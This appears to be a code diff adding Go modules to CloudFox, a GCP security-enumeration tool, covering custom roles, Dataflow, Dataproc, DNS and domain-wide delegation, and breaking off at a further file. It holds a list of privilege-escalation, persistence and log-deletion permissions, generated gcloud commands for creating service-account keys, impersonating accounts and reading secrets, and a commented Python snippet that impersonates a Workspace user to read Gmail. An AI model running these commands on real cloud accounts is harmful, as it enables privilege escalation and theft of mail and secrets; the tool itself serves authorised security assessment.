"HIGH"}, + + // Persistence - HIGH + {Permission: "compute.instances.setMetadata", Category: "persistence", Description: "Modify instance metadata/SSH keys", RiskLevel: "HIGH"}, + {Permission: "compute.projects.setCommonInstanceMetadata", Category: "persistence", Description: "Modify project-wide metadata", RiskLevel: "HIGH"}, + {Permission: "cloudfunctions.functions.create", Category: "persistence", Description: "Create cloud functions", RiskLevel: "MEDIUM"}, + {Permission: "cloudfunctions.functions.update", Category: "persistence", Description: "Update cloud functions", RiskLevel: "MEDIUM"}, + {Permission: "run.services.create", Category: "persistence", Description: "Create Cloud Run services", RiskLevel: "MEDIUM"}, + {Permission: "compute.instances.create", Category: "persistence", Description: "Create compute instances", RiskLevel: "MEDIUM"}, + + // Lateral Movement - HIGH + {Permission: "compute.instances.setServiceAccount", Category: "lateral_movement", Description: "Change instance SA", RiskLevel: "HIGH"}, + {Permission: "container.clusters.getCredentials", Category: "lateral_movement", Description: "Get GKE cluster credentials", RiskLevel: "HIGH"}, + {Permission: "cloudsql.instances.connect", Category: "lateral_movement", Description: "Connect to Cloud SQL", RiskLevel: "MEDIUM"}, + + // Organization/Folder level - CRITICAL + {Permission: "resourcemanager.organizations.setIamPolicy", Category: "privesc", Description: "Modify org-level IAM", RiskLevel: "CRITICAL"}, + {Permission: "resourcemanager.folders.setIamPolicy", Category: "privesc", Description: "Modify folder IAM", RiskLevel: "CRITICAL"}, + + // Logging/Audit - HIGH (covering tracks) + {Permission: "logging.sinks.delete", Category: "persistence", Description: "Delete log sinks", RiskLevel: "HIGH"}, + {Permission: "logging.logs.delete", Category: "persistence", Description: "Delete logs", RiskLevel: "HIGH"}, + } +} + +// ListCustomRoles lists all custom roles in a project +func (s *CustomRolesService) ListCustomRoles(projectID string) ([]CustomRoleInfo, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + var roles []CustomRoleInfo + parent := fmt.Sprintf("projects/%s", projectID) + + req := iamService.Projects.Roles.List(parent).ShowDeleted(false) + err = req.Pages(ctx, func(page *iam.ListRolesResponse) error { + for _, role := range page.Roles { + // Get full role details including permissions + roleDetail, err := iamService.Projects.Roles.Get(role.Name).Do() + if err != nil { + continue + } + + info := CustomRoleInfo{ + Name: extractRoleID(role.Name), + Title: role.Title, + Description: role.Description, + ProjectID: projectID, + Stage: role.Stage, + Deleted: role.Deleted, + IncludedPermissions: roleDetail.IncludedPermissions, + PermissionCount: len(roleDetail.IncludedPermissions), + RiskReasons: []string{}, + } + + // Analyze the role + info.RiskLevel, info.RiskReasons, info.DangerousPerms, info.PrivescPerms = s.analyzeRole(info) + + roles = append(roles, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list custom roles: %v", err) + } + + return roles, nil +} + +// AnalyzeRoleInDepth performs detailed security analysis on a role +func (s *CustomRolesService) AnalyzeRoleInDepth(role CustomRoleInfo) RolePermissionAnalysis { + analysis := RolePermissionAnalysis{ + RoleName: role.Name, + ProjectID: role.ProjectID, + TotalPermissions: role.PermissionCount, + PermissionsByType: make(map[string]int), + RiskReasons: []string{}, + ExploitCommands: []string{}, + } + + dangerousPerms := s.GetDangerousPermissions() + dangerousMap := make(map[string]DangerousPermission) + for _, dp := range dangerousPerms { + dangerousMap[dp.Permission] = dp + } + + // Categorize permissions + for _, perm := range role.IncludedPermissions { + // Extract service from permission (e.g., "storage" from "storage.objects.get") + parts := strings.Split(perm, ".") + if len(parts) > 0 { + service := parts[0] + analysis.PermissionsByType[service]++ + } + + // Check if dangerous + if dp, found := dangerousMap[perm]; found { + if dp.Category == "privesc" { + analysis.PrivescCount++ + } + analysis.DangerousCount++ + analysis.RiskReasons = append(analysis.RiskReasons, + fmt.Sprintf("[%s] %s: %s", dp.RiskLevel, perm, dp.Description)) + } + } + + // Generate exploitation commands based on permissions + for _, perm := range role.IncludedPermissions { + switch { + case strings.Contains(perm, "serviceAccountKeys.create"): + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Create SA key (role has %s):\ngcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", + perm, role.ProjectID)) + case strings.Contains(perm, "serviceAccounts.getAccessToken"): + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Get access token (role has %s):\ngcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", + perm, role.ProjectID)) + case strings.Contains(perm, "secretmanager.versions.access"): + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Access secrets (role has %s):\ngcloud secrets versions access latest --secret=SECRET_NAME --project=%s", + perm, role.ProjectID)) + case strings.Contains(perm, "setIamPolicy"): + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Modify IAM policy (role has %s):\n# This allows privilege escalation by granting yourself additional roles", + perm)) + } + } + + // Determine risk level + if analysis.PrivescCount >= 2 { + analysis.RiskLevel = "CRITICAL" + } else if analysis.PrivescCount == 1 || analysis.DangerousCount >= 3 { + analysis.RiskLevel = "HIGH" + } else if analysis.DangerousCount >= 1 { + analysis.RiskLevel = "MEDIUM" + } else { + analysis.RiskLevel = "LOW" + } + + return analysis +} + +// analyzeRole performs security analysis on a custom role +func (s *CustomRolesService) analyzeRole(role CustomRoleInfo) (riskLevel string, reasons []string, dangerousPerms []string, privescPerms []string) { + dangerousPermList := s.GetDangerousPermissions() + dangerousMap := make(map[string]DangerousPermission) + for _, dp := range dangerousPermList { + dangerousMap[dp.Permission] = dp + } + + score := 0 + + for _, perm := range role.IncludedPermissions { + if dp, found := dangerousMap[perm]; found { + dangerousPerms = append(dangerousPerms, perm) + if dp.Category == "privesc" { + privescPerms = append(privescPerms, perm) + score += 3 + reasons = append(reasons, fmt.Sprintf("Privesc permission: %s", perm)) + } else if dp.RiskLevel == "CRITICAL" { + score += 2 + reasons = append(reasons, fmt.Sprintf("Critical permission: %s", perm)) + } else if dp.RiskLevel == "HIGH" { + score += 1 + reasons = append(reasons, fmt.Sprintf("High-risk permission: %s", perm)) + } + } + + // Check for wildcard permissions + if strings.HasSuffix(perm, ".*") || strings.Contains(perm, "All") { + reasons = append(reasons, fmt.Sprintf("Broad permission: %s", perm)) + score += 1 + } + } + + // Large number of permissions is a risk indicator + if role.PermissionCount > 50 { + reasons = append(reasons, fmt.Sprintf("Large role with %d permissions", role.PermissionCount)) + score += 1 + } + + if score >= 6 { + riskLevel = "CRITICAL" + } else if score >= 3 { + riskLevel = "HIGH" + } else if score >= 1 { + riskLevel = "MEDIUM" + } else { + riskLevel = "LOW" + } + + return +} + +// extractRoleID extracts the role ID from the full name +func extractRoleID(name string) string { + // Format: projects/PROJECT_ID/roles/ROLE_ID + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} diff --git a/gcp/services/dataflowService/dataflowService.go b/gcp/services/dataflowService/dataflowService.go new file mode 100644 index 00000000..9e94bb40 --- /dev/null +++ b/gcp/services/dataflowService/dataflowService.go @@ -0,0 +1,178 @@ +package dataflowservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + dataflow "google.golang.org/api/dataflow/v1b3" +) + +type DataflowService struct { + session *gcpinternal.SafeSession +} + +func New() *DataflowService { + return &DataflowService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataflowService { + return &DataflowService{session: session} +} + +// JobInfo represents a Dataflow job +type JobInfo struct { + ID string `json:"id"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // JOB_TYPE_BATCH or JOB_TYPE_STREAMING + State string `json:"state"` // JOB_STATE_RUNNING, etc. + CreateTime string `json:"createTime"` + CurrentStateTime string `json:"currentStateTime"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + TempLocation string `json:"tempLocation"` // GCS temp location + StagingLocation string `json:"stagingLocation"` // GCS staging location + WorkerRegion string `json:"workerRegion"` + WorkerZone string `json:"workerZone"` + NumWorkers int64 `json:"numWorkers"` + MachineType string `json:"machineType"` + UsePublicIPs bool `json:"usePublicIps"` + EnableStreamingEngine bool `json:"enableStreamingEngine"` + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// TemplateInfo represents a Dataflow template +type TemplateInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + // Template metadata +} + +// ListJobs retrieves all Dataflow jobs in a project +func (s *DataflowService) ListJobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + var service *dataflow.Service + var err error + + if s.session != nil { + service, err = dataflow.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = dataflow.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Dataflow service: %v", err) + } + + var jobs []JobInfo + + // List jobs across all locations + req := service.Projects.Jobs.Aggregated(projectID) + err = req.Pages(ctx, func(page *dataflow.ListJobsResponse) error { + for _, job := range page.Jobs { + info := s.parseJob(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list Dataflow jobs: %v", err) + } + + return jobs, nil +} + +// parseJob converts a Dataflow job to JobInfo +func (s *DataflowService) parseJob(job *dataflow.Job, projectID string) JobInfo { + info := JobInfo{ + ID: job.Id, + Name: job.Name, + ProjectID: projectID, + Location: job.Location, + Type: job.Type, + State: job.CurrentState, + CreateTime: job.CreateTime, + CurrentStateTime: job.CurrentStateTime, + RiskReasons: []string{}, + } + + // Parse environment settings + if job.Environment != nil { + info.ServiceAccount = job.Environment.ServiceAccountEmail + info.TempLocation = job.Environment.TempStoragePrefix + info.WorkerRegion = job.Environment.WorkerRegion + info.WorkerZone = job.Environment.WorkerZone + + // Check worker pools for network config + if len(job.Environment.WorkerPools) > 0 { + wp := job.Environment.WorkerPools[0] + info.Network = wp.Network + info.Subnetwork = wp.Subnetwork + info.NumWorkers = wp.NumWorkers + info.MachineType = wp.MachineType + + // Check for public IPs - default is true if not specified + if wp.IpConfiguration == "WORKER_IP_PRIVATE" { + info.UsePublicIPs = false + } else { + info.UsePublicIPs = true + } + } + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeJobRisk(info) + + return info +} + +// analyzeJobRisk determines the risk level of a Dataflow job +func (s *DataflowService) analyzeJobRisk(job JobInfo) (string, []string) { + var reasons []string + score := 0 + + // Public IPs increase exposure + if job.UsePublicIPs { + reasons = append(reasons, "Workers use public IP addresses") + score += 2 + } + + // Default service account is often over-privileged + if job.ServiceAccount == "" || strings.Contains(job.ServiceAccount, "compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine service account") + score += 2 + } + + // Check for external temp/staging locations + if job.TempLocation != "" && !strings.Contains(job.TempLocation, projectID(job.ProjectID)) { + reasons = append(reasons, "Temp location may be in external project") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func projectID(id string) string { + return id +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/dataprocService/dataprocService.go b/gcp/services/dataprocService/dataprocService.go new file mode 100644 index 00000000..f2be3bda --- /dev/null +++ b/gcp/services/dataprocService/dataprocService.go @@ -0,0 +1,316 @@ +package dataprocservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + dataproc "google.golang.org/api/dataproc/v1" +) + +type DataprocService struct { + session *gcpinternal.SafeSession +} + +func New() *DataprocService { + return &DataprocService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataprocService { + return &DataprocService{session: session} +} + +// ClusterInfo represents a Dataproc cluster +type ClusterInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + State string `json:"state"` + StateStartTime string `json:"stateStartTime"` + ClusterUUID string `json:"clusterUuid"` + + // Config + ConfigBucket string `json:"configBucket"` + TempBucket string `json:"tempBucket"` + ImageVersion string `json:"imageVersion"` + ServiceAccount string `json:"serviceAccount"` + + // Master config + MasterMachineType string `json:"masterMachineType"` + MasterCount int64 `json:"masterCount"` + MasterDiskSizeGB int64 `json:"masterDiskSizeGb"` + + // Worker config + WorkerMachineType string `json:"workerMachineType"` + WorkerCount int64 `json:"workerCount"` + WorkerDiskSizeGB int64 `json:"workerDiskSizeGb"` + + // Network config + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + InternalIPOnly bool `json:"internalIpOnly"` + Zone string `json:"zone"` + + // Security config + KerberosEnabled bool `json:"kerberosEnabled"` + SecureBoot bool `json:"secureBoot"` + + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// JobInfo represents a Dataproc job +type JobInfo struct { + JobID string `json:"jobId"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + ClusterName string `json:"clusterName"` + Status string `json:"status"` + JobType string `json:"jobType"` + SubmittedBy string `json:"submittedBy"` + StartTime string `json:"startTime"` + EndTime string `json:"endTime"` +} + +// Common GCP regions for Dataproc +var dataprocRegions = []string{ + "us-central1", "us-east1", "us-east4", "us-west1", "us-west2", "us-west3", "us-west4", + "europe-west1", "europe-west2", "europe-west3", "europe-west4", "europe-west6", + "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", + "asia-south1", "asia-southeast1", "asia-southeast2", + "australia-southeast1", "southamerica-east1", "northamerica-northeast1", +} + +// ListClusters retrieves all Dataproc clusters +func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) { + ctx := context.Background() + var service *dataproc.Service + var err error + + if s.session != nil { + service, err = dataproc.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = dataproc.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Dataproc service: %v", err) + } + + var clusters []ClusterInfo + + // List across common regions + for _, region := range dataprocRegions { + regionClusters, err := service.Projects.Regions.Clusters.List(projectID, region).Context(ctx).Do() + if err != nil { + continue // Skip regions with errors (API not enabled, no permissions, etc.) + } + + for _, cluster := range regionClusters.Clusters { + info := s.parseCluster(cluster, projectID, region) + clusters = append(clusters, info) + } + } + + return clusters, nil +} + +// ListJobs retrieves recent Dataproc jobs +func (s *DataprocService) ListJobs(projectID, region string) ([]JobInfo, error) { + ctx := context.Background() + var service *dataproc.Service + var err error + + if s.session != nil { + service, err = dataproc.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = dataproc.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Dataproc service: %v", err) + } + + var jobs []JobInfo + + resp, err := service.Projects.Regions.Jobs.List(projectID, region).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to list jobs: %v", err) + } + + for _, job := range resp.Jobs { + info := s.parseJob(job, projectID, region) + jobs = append(jobs, info) + } + + return jobs, nil +} + +func (s *DataprocService) parseCluster(cluster *dataproc.Cluster, projectID, region string) ClusterInfo { + info := ClusterInfo{ + Name: cluster.ClusterName, + ProjectID: projectID, + Region: region, + ClusterUUID: cluster.ClusterUuid, + RiskReasons: []string{}, + } + + if cluster.Status != nil { + info.State = cluster.Status.State + info.StateStartTime = cluster.Status.StateStartTime + } + + if cluster.Config != nil { + info.ConfigBucket = cluster.Config.ConfigBucket + info.TempBucket = cluster.Config.TempBucket + + // Software config + if cluster.Config.SoftwareConfig != nil { + info.ImageVersion = cluster.Config.SoftwareConfig.ImageVersion + } + + // GCE cluster config + if cluster.Config.GceClusterConfig != nil { + gcc := cluster.Config.GceClusterConfig + info.ServiceAccount = gcc.ServiceAccount + info.Network = extractName(gcc.NetworkUri) + info.Subnetwork = extractName(gcc.SubnetworkUri) + info.InternalIPOnly = gcc.InternalIpOnly + info.Zone = extractName(gcc.ZoneUri) + + if gcc.ShieldedInstanceConfig != nil { + info.SecureBoot = gcc.ShieldedInstanceConfig.EnableSecureBoot + } + } + + // Master config + if cluster.Config.MasterConfig != nil { + mc := cluster.Config.MasterConfig + info.MasterMachineType = extractName(mc.MachineTypeUri) + info.MasterCount = mc.NumInstances + if mc.DiskConfig != nil { + info.MasterDiskSizeGB = mc.DiskConfig.BootDiskSizeGb + } + } + + // Worker config + if cluster.Config.WorkerConfig != nil { + wc := cluster.Config.WorkerConfig + info.WorkerMachineType = extractName(wc.MachineTypeUri) + info.WorkerCount = wc.NumInstances + if wc.DiskConfig != nil { + info.WorkerDiskSizeGB = wc.DiskConfig.BootDiskSizeGb + } + } + + // Security config + if cluster.Config.SecurityConfig != nil && cluster.Config.SecurityConfig.KerberosConfig != nil { + info.KerberosEnabled = true + } + } + + info.RiskLevel, info.RiskReasons = s.analyzeClusterRisk(info) + + return info +} + +func (s *DataprocService) parseJob(job *dataproc.Job, projectID, region string) JobInfo { + info := JobInfo{ + JobID: job.Reference.JobId, + ProjectID: projectID, + Region: region, + ClusterName: job.Placement.ClusterName, + } + + if job.Status != nil { + info.Status = job.Status.State + info.StartTime = job.Status.StateStartTime + } + + if job.StatusHistory != nil && len(job.StatusHistory) > 0 { + for _, status := range job.StatusHistory { + if status.State == "DONE" || status.State == "ERROR" || status.State == "CANCELLED" { + info.EndTime = status.StateStartTime + break + } + } + } + + // Determine job type + if job.HadoopJob != nil { + info.JobType = "Hadoop" + } else if job.SparkJob != nil { + info.JobType = "Spark" + } else if job.PysparkJob != nil { + info.JobType = "PySpark" + } else if job.HiveJob != nil { + info.JobType = "Hive" + } else if job.PigJob != nil { + info.JobType = "Pig" + } else if job.SparkRJob != nil { + info.JobType = "SparkR" + } else if job.SparkSqlJob != nil { + info.JobType = "SparkSQL" + } else if job.PrestoJob != nil { + info.JobType = "Presto" + } else { + info.JobType = "Unknown" + } + + return info +} + +func (s *DataprocService) analyzeClusterRisk(cluster ClusterInfo) (string, []string) { + var reasons []string + score := 0 + + // Public IPs + if !cluster.InternalIPOnly { + reasons = append(reasons, "Cluster nodes have public IP addresses") + score += 2 + } + + // Default service account + if cluster.ServiceAccount == "" || strings.Contains(cluster.ServiceAccount, "compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine service account") + score += 2 + } + + // No Kerberos + if !cluster.KerberosEnabled { + reasons = append(reasons, "Kerberos authentication not enabled") + score += 1 + } + + // No secure boot + if !cluster.SecureBoot { + reasons = append(reasons, "Secure Boot not enabled") + score += 1 + } + + // Old image version (simplified check) + if cluster.ImageVersion != "" && strings.HasPrefix(cluster.ImageVersion, "1.") { + reasons = append(reasons, fmt.Sprintf("Using older image version: %s", cluster.ImageVersion)) + score += 1 + } + + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullPath string) string { + if fullPath == "" { + return "" + } + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/dnsService/dnsService.go b/gcp/services/dnsService/dnsService.go new file mode 100644 index 00000000..c065f08d --- /dev/null +++ b/gcp/services/dnsService/dnsService.go @@ -0,0 +1,174 @@ +package dnsservice + +import ( + "context" + "fmt" + "strings" + + dns "google.golang.org/api/dns/v1" +) + +type DNSService struct{} + +func New() *DNSService { + return &DNSService{} +} + +// ZoneInfo holds Cloud DNS managed zone details +type ZoneInfo struct { + Name string + ProjectID string + DNSName string // The DNS name (e.g., example.com.) + Description string + Visibility string // public or private + CreationTime string + + // DNSSEC configuration + DNSSECState string // on, off, transfer + DNSSECKeyType string + + // Private zone configuration + PrivateNetworks []string // VPC networks for private zones + + // Peering configuration + PeeringNetwork string + PeeringTargetProject string + + // Forwarding configuration + ForwardingTargets []string + + // Record count + RecordCount int64 +} + +// RecordInfo holds DNS record details +type RecordInfo struct { + Name string + ProjectID string + ZoneName string + Type string // A, AAAA, CNAME, MX, TXT, etc. + TTL int64 + RRDatas []string // Record data +} + +// Zones retrieves all DNS managed zones in a project +func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { + ctx := context.Background() + + service, err := dns.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create DNS service: %v", err) + } + + var zones []ZoneInfo + + call := service.ManagedZones.List(projectID) + err = call.Pages(ctx, func(page *dns.ManagedZonesListResponse) error { + for _, zone := range page.ManagedZones { + info := parseZoneInfo(zone, projectID) + zones = append(zones, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list zones: %v", err) + } + + return zones, nil +} + +// Records retrieves all DNS records in a zone +func (ds *DNSService) Records(projectID, zoneName string) ([]RecordInfo, error) { + ctx := context.Background() + + service, err := dns.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create DNS service: %v", err) + } + + var records []RecordInfo + + call := service.ResourceRecordSets.List(projectID, zoneName) + err = call.Pages(ctx, func(page *dns.ResourceRecordSetsListResponse) error { + for _, rrset := range page.Rrsets { + info := RecordInfo{ + Name: rrset.Name, + ProjectID: projectID, + ZoneName: zoneName, + Type: rrset.Type, + TTL: rrset.Ttl, + RRDatas: rrset.Rrdatas, + } + records = append(records, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list records: %v", err) + } + + return records, nil +} + +// parseZoneInfo extracts relevant information from a DNS managed zone +func parseZoneInfo(zone *dns.ManagedZone, projectID string) ZoneInfo { + info := ZoneInfo{ + Name: zone.Name, + ProjectID: projectID, + DNSName: zone.DnsName, + Description: zone.Description, + Visibility: zone.Visibility, + CreationTime: zone.CreationTime, + } + + // DNSSEC configuration + if zone.DnssecConfig != nil { + info.DNSSECState = zone.DnssecConfig.State + if len(zone.DnssecConfig.DefaultKeySpecs) > 0 { + info.DNSSECKeyType = zone.DnssecConfig.DefaultKeySpecs[0].Algorithm + } + } + + // Private zone configuration + if zone.PrivateVisibilityConfig != nil { + for _, network := range zone.PrivateVisibilityConfig.Networks { + info.PrivateNetworks = append(info.PrivateNetworks, extractNetworkName(network.NetworkUrl)) + } + } + + // Peering configuration + if zone.PeeringConfig != nil && zone.PeeringConfig.TargetNetwork != nil { + info.PeeringNetwork = extractNetworkName(zone.PeeringConfig.TargetNetwork.NetworkUrl) + // Extract project from network URL + if strings.Contains(zone.PeeringConfig.TargetNetwork.NetworkUrl, "/projects/") { + parts := strings.Split(zone.PeeringConfig.TargetNetwork.NetworkUrl, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + info.PeeringTargetProject = parts[i+1] + break + } + } + } + } + + // Forwarding configuration + if zone.ForwardingConfig != nil { + for _, target := range zone.ForwardingConfig.TargetNameServers { + info.ForwardingTargets = append(info.ForwardingTargets, target.Ipv4Address) + } + } + + return info +} + +// extractNetworkName extracts the network name from a network URL +func extractNetworkName(networkURL string) string { + // Format: https://www.googleapis.com/compute/v1/projects/PROJECT/global/networks/NETWORK + parts := strings.Split(networkURL, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return networkURL +} diff --git a/gcp/services/domainWideDelegationService/domainWideDelegationService.go b/gcp/services/domainWideDelegationService/domainWideDelegationService.go new file mode 100644 index 00000000..77c8528c --- /dev/null +++ b/gcp/services/domainWideDelegationService/domainWideDelegationService.go @@ -0,0 +1,228 @@ +package domainwidedelegationservice + +import ( + "context" + "fmt" + "strings" + + iam "google.golang.org/api/iam/v1" +) + +type DomainWideDelegationService struct{} + +func New() *DomainWideDelegationService { + return &DomainWideDelegationService{} +} + +// DWDServiceAccount represents a service account with domain-wide delegation +type DWDServiceAccount struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + OAuth2ClientID string `json:"oauth2ClientId"` + DWDEnabled bool `json:"dwdEnabled"` + HasKeys bool `json:"hasKeys"` + KeyCount int `json:"keyCount"` + Description string `json:"description"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + WorkspaceScopes []string `json:"workspaceScopes"` // Common Workspace scopes to try +} + +// Common Google Workspace OAuth scopes that DWD service accounts might have +var CommonWorkspaceScopes = []string{ + "https://www.googleapis.com/auth/gmail.readonly", + "https://www.googleapis.com/auth/gmail.send", + "https://www.googleapis.com/auth/gmail.modify", + "https://www.googleapis.com/auth/drive", + "https://www.googleapis.com/auth/drive.readonly", + "https://www.googleapis.com/auth/calendar", + "https://www.googleapis.com/auth/calendar.readonly", + "https://www.googleapis.com/auth/admin.directory.user.readonly", + "https://www.googleapis.com/auth/admin.directory.group.readonly", + "https://www.googleapis.com/auth/spreadsheets", + "https://www.googleapis.com/auth/contacts.readonly", + "https://mail.google.com/", +} + +// GetDWDServiceAccounts finds service accounts that may have domain-wide delegation +func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([]DWDServiceAccount, error) { + ctx := context.Background() + service, err := iam.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + var dwdAccounts []DWDServiceAccount + + // List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.ServiceAccounts.List(parent).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to list service accounts: %v", err) + } + + for _, sa := range resp.Accounts { + // Check if the service account has an OAuth2 client ID (required for DWD) + // The OAuth2ClientId field is populated when DWD is enabled + dwdEnabled := sa.Oauth2ClientId != "" + + account := DWDServiceAccount{ + Email: sa.Email, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + OAuth2ClientID: sa.Oauth2ClientId, + DWDEnabled: dwdEnabled, + Description: sa.Description, + RiskReasons: []string{}, + ExploitCommands: []string{}, + WorkspaceScopes: CommonWorkspaceScopes, + } + + // Check for keys + keysResp, err := service.Projects.ServiceAccounts.Keys.List( + fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email), + ).Context(ctx).Do() + if err == nil { + // Count user-managed keys (not system-managed) + userKeyCount := 0 + for _, key := range keysResp.Keys { + if key.KeyType == "USER_MANAGED" { + userKeyCount++ + } + } + account.HasKeys = userKeyCount > 0 + account.KeyCount = userKeyCount + } + + // Analyze risk + account.RiskLevel, account.RiskReasons = s.analyzeRisk(account) + + // Generate exploit commands + account.ExploitCommands = s.generateExploitCommands(account) + + // Only include accounts with DWD or that look like they might be used for it + if dwdEnabled || s.looksLikeDWDAccount(account) { + dwdAccounts = append(dwdAccounts, account) + } + } + + return dwdAccounts, nil +} + +// looksLikeDWDAccount checks if a service account might be used for DWD based on naming +func (s *DomainWideDelegationService) looksLikeDWDAccount(account DWDServiceAccount) bool { + emailLower := strings.ToLower(account.Email) + descLower := strings.ToLower(account.Description) + nameLower := strings.ToLower(account.DisplayName) + + // Common naming patterns for DWD service accounts + dwdPatterns := []string{ + "delegation", "dwd", "workspace", "gsuite", "admin", + "gmail", "drive", "calendar", "directory", "impersonat", + } + + for _, pattern := range dwdPatterns { + if strings.Contains(emailLower, pattern) || + strings.Contains(descLower, pattern) || + strings.Contains(nameLower, pattern) { + return true + } + } + + return false +} + +func (s *DomainWideDelegationService) analyzeRisk(account DWDServiceAccount) (string, []string) { + var reasons []string + score := 0 + + if account.DWDEnabled { + reasons = append(reasons, "Domain-wide delegation ENABLED (OAuth2 Client ID present)") + score += 3 + } + + if account.HasKeys { + reasons = append(reasons, fmt.Sprintf("Has %d user-managed key(s) - can be used for impersonation", account.KeyCount)) + score += 2 + } + + if account.DWDEnabled && account.HasKeys { + reasons = append(reasons, "CRITICAL: DWD enabled + keys exist = can impersonate any Workspace user!") + score += 2 + } + + // Check for suspicious naming + if s.looksLikeDWDAccount(account) && !account.DWDEnabled { + reasons = append(reasons, "Name suggests DWD purpose but OAuth2 Client ID not detected") + score += 1 + } + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *DomainWideDelegationService) generateExploitCommands(account DWDServiceAccount) []string { + var commands []string + + if !account.DWDEnabled { + commands = append(commands, + "# DWD not confirmed - OAuth2 Client ID not present", + "# Check Google Admin Console: Security > API Controls > Domain-wide Delegation", + ) + return commands + } + + commands = append(commands, + fmt.Sprintf("# Domain-Wide Delegation Service Account: %s", account.Email), + fmt.Sprintf("# OAuth2 Client ID: %s", account.OAuth2ClientID), + "", + "# To exploit DWD, you need:", + "# 1. A key file for this service account", + "# 2. The email of a Workspace user to impersonate", + "# 3. Knowledge of which scopes are authorized in Admin Console", + "", + ) + + if account.HasKeys { + commands = append(commands, + "# Download existing key (if you have iam.serviceAccountKeys.create permission):", + fmt.Sprintf("gcloud iam service-accounts keys create /tmp/key.json --iam-account=%s", account.Email), + "", + ) + } + + commands = append(commands, + "# Python exploit example:", + "# from google.oauth2 import service_account", + "# from googleapiclient.discovery import build", + "#", + "# creds = service_account.Credentials.from_service_account_file(", + "# 'key.json',", + fmt.Sprintf("# scopes=['https://www.googleapis.com/auth/gmail.readonly'],"), + "# subject='admin@yourdomain.com' # User to impersonate", + "# )", + "#", + "# gmail = build('gmail', 'v1', credentials=creds)", + "# messages = gmail.users().messages().list(userId='me').execute()", + "", + "# Common scopes to test (must be authorized in Admin Console):", + ) + + for _, scope := range CommonWorkspaceScopes[:5] { // First 5 most useful scopes + commands = append(commands, fmt.Sprintf("# - %s", scope)) + } + + return commands +} diff --git a/gcp/services/filestoreService/filestoreService.go b/gcp/services/filestoreService/filestoreService.go new file mode 100644 index 00000000..0335c2d4 --- /dev/null +++ b/gcp/services/filestoreService/filestoreService.go @@ -0,0 